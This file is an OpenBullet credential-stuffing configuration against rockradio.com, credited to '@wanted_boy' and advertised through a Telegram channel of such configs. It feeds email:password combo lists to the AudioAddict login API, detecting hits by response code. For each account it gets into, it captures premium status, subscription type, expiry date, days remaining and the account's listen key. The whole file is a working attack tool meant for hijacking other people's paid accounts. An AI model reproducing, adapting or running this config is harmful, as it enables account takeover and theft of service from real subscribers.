[SETTINGS]
{
  "Name": "rockradio.com",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2022-06-22T03:04:15.0512937+08:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@wanted_boy",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#US FUNCTION URLEncode "<USER>" -> VAR "US" 

#PS FUNCTION URLEncode "<PASS>" -> VAR "PS" 

#Login REQUEST POST "https://api.audioaddict.com/v1/rockradio/member_sessions" AutoRedirect=FALSE 
  CONTENT "member_session%5Busername%5D=<US>&member_session%5Bpassword%5D=<PS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: api.audioaddict.com" 
  HEADER "Accept: */*" 
  HEADER "Accept-Language: en-us" 
  HEADER "User-Agent: AudioAddict-rockradio/4.8.2.7922 iOS/15.2" 
  HEADER "Authorization: Basic bW9iaWxlOmFwcHM=" 
  HEADER "Accept-Encoding: gzip, deflate" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "<RESPONSECODE>" EqualTo "422" 
  KEYCHAIN Success OR 
    KEY "<RESPONSECODE>" EqualTo "201" 

#userType PARSE "<SOURCE>" LR "user_type\":\"" "\"" -> VAR "userType" 

IF "<userType>" EqualTo "premium"
SET STATUS SUCCESS
SET CAP "userType" "<userType>"
ELSE
SET STATUS CUSTOM "CUSTOM"
ENDIF

#autoRenew PARSE "<SOURCE>" LR "auto_renew\":" "," CreateEmpty=FALSE -> CAP "autoRenew" 

#ST PARSE "<SOURCE>" LR "term_unit\":\"" "\"" -> VAR "ST" 

#subscriptionType FUNCTION Translate 
  KEY "month" VALUE "monthly" 
  KEY "year" VALUE "yearly" 
  "<ST>" -> CAP "subscriptionType" 

#expireDate PARSE "<SOURCE>" LR "expires_on\":\"" "\"" CreateEmpty=FALSE -> CAP "expireDate" 

#unix FUNCTION DateToUnixTime "yyyy-MM-dd" "<expireDate>" -> VAR "unix" 

#current FUNCTION CurrentUnixTime -> VAR "current" 

#compute FUNCTION Compute "(<unix>-<current>)/86400" -> VAR "compute" 

#daysLeft FUNCTION Round "<compute>" -> CAP "daysLeft" 

#listenKey PARSE "<SOURCE>" LR "listen_key\":\"" "\"" CreateEmpty=FALSE -> CAP "listenKey" 

SET CAP "Config By" "@wanted_boy"
SET CAP "Telegram Channel" "https://t.me/OpenBullet_CFGs"

